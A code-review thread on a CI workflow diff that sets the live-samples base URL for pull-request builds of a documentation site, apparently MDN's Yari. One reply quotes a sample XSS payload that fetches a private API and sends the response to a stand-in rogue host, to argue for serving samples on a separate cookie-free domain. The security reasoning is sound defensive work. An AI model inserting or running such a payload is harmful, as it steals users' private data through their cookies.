.github/workflows/pr-build.yml

```diff
@@ -77,6 +77,12 @@ jobs:
           # functional tests have a gap in them but actually building
           # real content exposes it.
 
+          # This environment variable actually only matters if you're going
+          # to be browsing the pages that are built but *if* we some day
+          # decide to ship PR builds to a public URL, it's good that it's
+          # using public base URL that could work outside people's laptops.
+          export BUILD_LIVE_SAMPLES_BASE_URL=https://mdn.mozillademos.org
```

Comment:
Here I think we'll have to be something like `"https://${{ env.GITHUB_REF_NAME_SLUG }}.content.dev.mdn.mozit.cloud` since the PR may have modified one or more of the live samples, and we'll have to direct the live-sample request to the proper folder within the S3 bucket. I think it's OK to use he same domain, since there won't be any access to the Django service (for accounts), although we could create a separate domain as well.

Reply:
Another option is it use `export BUILD_LIVE_SAMPLES_BASE_URL=/` 
that means that Yari will build the iframes like this:
```html
<iframe src="//en-US/docs/Foo/Bar/_samples_/index.html">
```
which becomes the same effect as if it was:
```html
<iframe src="./_samples_/index.html">
```
because the whole point of having a different domain is ultimately to prevent XSS attacks on `developer.mozilla.org` because you could make a content change that sets this example:

```html
<pre class="brush:js">
fetch('/api/v1/private').then(r =>r.json()).then(r=> fetch(`https://rogue.example.com?${r}`))
</pre>
```
and unsuspecting viewer of this live sample would use your cookie for the site. 
But if you serve this built live sample on `pr123.content.dev.mozit.cloud` there is no such risk even if the XSS executes because there are no cookies that might get auto-appended by the browser.

Reply:
Updated the code now. r?

Reply:
> But if you serve this built live sample on pr123.content.dev.mozit.cloud there is no such risk even if the XSS executes because there are no cookies that might get auto-appended by the browser.

Yep, totally agree.